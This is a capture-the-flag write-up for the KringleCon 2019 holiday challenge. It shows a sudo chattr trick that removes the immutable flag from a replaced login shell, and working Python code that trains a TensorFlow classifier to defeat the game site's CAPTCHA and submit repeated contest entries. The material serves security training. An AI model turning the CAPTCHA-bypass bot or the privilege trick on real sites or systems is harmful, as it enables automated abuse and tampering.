Objective

image-20200102172112619

Link: https://fridosleigh.com/

Narrative

Krampus continues after I find him in the steam tunnels:

But, before I can tell you more, I need to know that I can trust you.

Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I’ll know I can trust you.

The contest is here on my screen and at fridosleigh.com.

No purchase necessary, enter as often as you want, so I am!

They set up the rules, and lately, I have come to realize that I have certain materialistic, cookie needs.

Unfortunately, it’s restricted to elves only, and I can’t bypass the CAPTEHA.

(That’s Completely Automated Public Turing test to tell Elves and Humans Apart.)

I’ve already cataloged 12,000 images and decoded the API interface.

Can you help me bypass the CAPTEHA and submit lots of entries?

Terminal - Nyanshell

Challenge

Going out of the tunnels, out of the dorm, across the quad to Hermey Hall, and into the Speaker Unpreparedness Room, I find Alabaster:

image-20200102114908334

Welcome to the Speaker UNpreparedness Room!

My name’s Alabaster Snowball and I could use a hand.

I’m trying to log into this terminal, but something’s gone horribly wrong.

Every time I try to log in, I get accosted with … a hatted cat and a toaster pastry?

I thought my shell was Bash, not flying feline.

When I try to overwrite it with something else, I get permission errors.

Have you heard any chatter about immutable files? And what is sudo -l telling me?

Going into the terminal, I’m greeted with a challenge:

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄░░░░░░░░░
░░░░░░░░▄▀░░░░░░░░░░░░▄░░░░░░░▀▄░░░░░░░
░░░░░░░░█░░▄░░░░▄░░░░░░░░░░░░░░█░░░░░░░
░░░░░░░░█░░░░░░░░░░░░▄█▄▄░░▄░░░█░▄▄▄░░░
░▄▄▄▄▄░░█░░░░░░▀░░░░▀█░░▀▄░░░░░█▀▀░██░░
░██▄▀██▄█░░░▄░░░░░░░██░░░░▀▀▀▀▀░░░░██░░
░░▀██▄▀██░░░░░░░░▀░██▀░░░░░░░░░░░░░▀██░
░░░░▀████░▀░░░░▄░░░██░░░▄█░░░░▄░▄█░░██░
░░░░░░░▀█░░░░▄░░░░░██░░░░▄░░░▄░░▄░░░██░
░░░░░░░▄█▄░░░░░░░░░░░▀▄░░▀▀▀▀▀▀▀▀░░▄▀░░
░░░░░░█▀▀█████████▀▀▀▀████████████▀░░░░
░░░░░░████▀░░███▀░░░░░░▀███░░▀██▀░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
nyancat, nyancat
I love that nyancat!
My shell's stuffed inside one
Whatcha' think about that?
Sadly now, the day's gone
Things to do!  Without one...
I'll miss that nyancat
Run commands, win, and done!
Log in as the user alabaster_snowball with a password of Password2, and land in a Bash prompt.
Target Credentials:
username: alabaster_snowball
password: Password2
elf@5ba094121628:~$

Solution

The goal here is to get a bash shell as Alabaster, and I have his username and password. I’ll start with su alabaster_snowball. I’m prompted for a password, and when I enter it, I get:

That will run until I Ctrl+c to kill it. That must be the toaster cat Alabaster was talking about, as Nyan Cat is a 2011 internet meme about a cat with a Pop-Tart torso flying through space with a rainbow trail.

I’ll check the /etc/passwd file for alabaster and see his shell is set to /bin/nsh:

elf@59882697f2a5:~$ grep alabaster /etc/passwd
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh

I don’t have permission to change /etc/passwd:

elf@cd8ee16e5895:~$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1029 Dec 11 17:40 /etc/passwd

If I run ls -l on the file, I’ll see it is owned by root, but world writable:

elf@59882697f2a5:~$ ls -l /bin/nsh
-rwxrwxrwx 1 root root 75680 Dec 11 17:40 /bin/nsh

And yet, if I try to overwrite it, it fails:

elf@59882697f2a5:~$ cp /bin/bash /bin/nsh
cp: cannot create regular file '/bin/nsh': Operation not permitted

Alabaster also mentioned to check sudo -l:

elf@59882697f2a5:~$ sudo -l
Matching Defaults entries for elf on 59882697f2a5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User elf may run the following commands on 59882697f2a5:
    (root) NOPASSWD: /usr/bin/chattr

This tells me that I can run /usr/bin/chattr as root without a password.

chattr is the utility to change file attributes on a Linux system. ls -l will show read (r), write (w), and execute (x), but there are actually more attributes. The man page for chattr lists them:

The letters ‘acdeijstuADST’ select the new attributes for the files: append only (a), compressed (c), no dump (d), extent format (e), immutable (i), data journalling (j), secure deletion (s), no tail-merging (t), undeletable (u), no atime updates (A), synchronous directory updates (D), synchronous updates (S), and top of directory hierarchy (T).

The following attributes are read-only, and may be listed by lsattr but not modified by chattr: huge file (h), compression error (E), indexed directory (I), compression raw access (X), and compressed dirty file (Z).

I’ll run lsattr on /bin/nsh, and see the i for immutable is set (as well as the e for extent format):

elf@c8ae3e046f7f:~$ lsattr /bin/nsh 
----i---------e---- /bin/nsh

That’s what’s preventing the copy. I can try to change it as elf, but elf doesn’t have permissions:

elf@c8ae3e046f7f:~$ chattr -i /bin/nsh 
chattr: Permission denied while setting flags on /bin/nsh

But, I know I can run it as root with sudo and no password:

elf@c8ae3e046f7f:~$ sudo /usr/bin/chattr -i /bin/nsh 
elf@c8ae3e046f7f:~$ lsattr /bin/nsh 
--------------e---- /bin/nsh

Now the copy runs without issue:

elf@c8ae3e046f7f:~$ cp /bin/bash /bin/nsh 

I’ll su to Alabaster again, and it works:

elf@c8ae3e046f7f:~$ su alabaster_snowball
Password: 
Loading, please wait......
You did it! Congratulations!
alabaster_snowball@c8ae3e046f7f:/home/elf$

Hints

On solving, Alabaster directs me to look at the KringleCon talks for one about using machine learning to bypass capteha:

Who would do such a thing?? Well, it IS a good looking cat.

Have you heard about the Frido Sleigh contest?

There are some serious prizes up for grabs.

The content is strictly for elves. Only elves can pass the CAPTEHA challenge required to enter.

I heard there was a talk at KCII about using machine learning to defeat challenges like this.

I don’t think anything could ever beat an elf though!

Objective Challenge

Enumeration

Visiting the site presents a form:

image-20200102174606185

Clicking on the “I’m not human” buttom pops up a window with images, and a 5 second timer:

image-20200102174637797

It’s impossible to click on all the correct images in five seconds, so I need to automate this.

TensorFlow Model

In his 2019 KringleCon talk, Machine Learning Use Cases for Cybersecurity, Chris Davis gives a demo and some sample code to create a machine learning model from images of apples and bananas. I can use this same code to train on the 12,000 images that Krampus gave me. After making sure to have all the pre-reqs installed, I decompressed the training data into a folder, training_set:

$ ls training_set/
'Candy Canes'  'Christmas Trees'   Ornaments   Presents  'Santa Hats'   Stockings

Now I ran retrain.py:

$ python3 retrain.py --image_dir training_set/

It ran for about 30 minutes. When it was done, I wanted to give it a test run. I clicked on the capteha a few times and downloaded a few images, naming them after what they were:

$ ls unknown_images/
candycane.png  hat1.png  hat.png  ornament.png  present.png  stocking.png

Then I ran the model against it:

$ python3 predict_images_using_trained_model.py 
Processing Image unknown_images/stocking.png
Processing Image unknown_images/ornament.png
Processing Image unknown_images/candycane.png
Processing Image unknown_images/present.png
Processing Image unknown_images/hat1.png
Processing Image unknown_images/hat.png
Waiting For Threads to Finish...
TensorFlow Predicted unknown_images/candycane.png is a Candy Canes with 99.30% Accuracy
TensorFlow Predicted unknown_images/present.png is a Presents with 99.96% Accuracy
TensorFlow Predicted unknown_images/hat1.png is a Santa Hats with 99.99% Accuracy
TensorFlow Predicted unknown_images/hat.png is a Santa Hats with 99.88% Accuracy
TensorFlow Predicted unknown_images/stocking.png is a Stockings with 99.91% Accuracy
TensorFlow Predicted unknown_images/ornament.png is a Ornaments with 90.08% Accuracy

That seems to be working well!

API

Krampus also gave me a skeleton program to interact with the API:

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys

def main():
    yourREALemailAddress = "YourRealEmail@SomeRealEmailDomain.RealTLD"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    '''
    MISSING IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''

    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    final_answer = ','.join( [ img['uuid'] for img in b64_images ] )

    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed. 
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)


if __name__ == "__main__":
    main()

This is worth taking a minute to understand. It uses requests to issue a POST request to https://fridosleigh.com/api/capteha/request. The results come back and are processed as JSON into json_resp. I can take a look at the format here in the Python terminal:

$ python3
Python 3.6.9 (default, Nov  7 2019, 10:44:02) 
[GCC 8.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> import json
>>> import sys
>>> s = requests.Session()
>>> url = "https://fridosleigh.com/"
>>> json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
>>> json_resp.keys()    
dict_keys(['images', 'request', 'select_type'])

request is True. select_type is the things that I should be clicking on:

>>> json_resp['request']
True
>>> json_resp['select_type']
'Candy Canes, Christmas Trees, and Santa Hats'

images is list of 100 images (that make the 10x10 grid). For each item, it has a uuid and a base64, where the base64 is the base64-encoded bytes of the image itself:

>>> len(json_resp['images'])
100
>>> json_resp['images'][0].keys()
dict_keys(['base64', 'uuid'])
>>> json_resp['images'][0]['uuid']
'b60bf4bc-e584-11e9-97c1-309c23aaf0ac'
>>> json_resp['images'][0]['base64'][:50]
'iVBORw0KGgoAAAANSUhEUgAAAHgAAAB4CAYAAAA5ZDbSAAAABG'

Now, I’m supposed to do some processing, and leave it such that I have a comma separated list of UUIDs that matched the types in select_type. It POSTs that data to /api/capteha/submit, and checks the result. If it failed, it prints an error message. If it succeeded, it goes on to submit entries until it reaches 200 or it gets an error that it can’t submit because this email address already won.

New Code

In the example code from GitHub, it looks through all the images in a directory and classifies them, printing the results to the screen. I want to change that so that it’s a function that takes a list of images (uuids and encoded bytes), processes them, returning a dictionary where the keys are uuids, and the values are the category of the image.

I created a copy of the example file, but renamed main to process_capteha(images). I made changes to the function so that it would loop over the images, passing each one to the predict_image function, and at the end, return a dictionary as desired. I made a minor change to predict_image, changing the image_full_path variable to uuid. The final code, capteha_ident.py, looks like:

#!/usr/bin/python3
# Image Recognition Using Tensorflow Exmaple.
# Code based on example at:
# https://raw.githubusercontent.com/tensorflow/tensorflow/master/tensorflow/examples/label_image/label_image.py
import base64
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
import numpy as np
import threading
import queue
import time
import sys


def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, uuid, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'uuid':uuid, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

def process_capteha(images):
    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to spead up the processing
    q = queue.Queue()

    #Going to interate over each of our images.
    for image in images:
        uuid = image['uuid']

        sys.stdout.write(f'\rProcessing Image {uuid}')
        sys.stdout.flush()
        # We don't want to process too many images at once
        while len(threading.enumerate()) > 20:
            time.sleep(0.0001)

        #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        image_bytes = base64.b64decode(image['base64'])
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, uuid, labels, input_operation, output_operation)).start()

    print('\r[*] Waiting For Threads to Finish...')
    while q.qsize() < len(images):
        time.sleep(0.001)

    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    #do something with our results... Like print them to the screen.
    predictions = {}
    for prediction in prediction_results:
        #print('TensorFlow Predicted {uuid} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction))
        predictions[prediction['uuid']] = prediction['prediction']
    return predictions

Now, I’ll import this at the top of the code I got from Krampus:

import capteha_ident

Then, I’ll generate final_answer:

    results = capteha_ident.process_capteha(json_resp['images'])
    final_answer = ','.join([uuid for uuid in results if results[uuid] in challenge_image_types])

The rest of the code stays the same, except I modified some of the prints to look nicer:

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import capteha_ident


def main():
    yourREALemailAddress = '[redacted]'

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    results = capteha_ident.process_capteha(json_resp['images'])
    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    final_answer = ','.join([uuid for uuid in results if results[uuid] in challenge_image_types])

    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('[+] CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed. 
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        sys.stdout.write('\rSubmitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        sys.stdout.flush()
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(f'\n[+]{entry_response}')


if __name__ == "__main__":
    main()

When it runs, it succeeds in entering enough times to win:

In my email there’s an email with code to enter into my badge:

image-20200102201632147

Narrative

Talking to Krampus again, he’s happy:

You did it! Thank you so much. I can trust you!

To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels.

I also gain access now to the Steam Tunnels network, allowing me to teleport via my badge to select places across the campus:

image-20200112060122521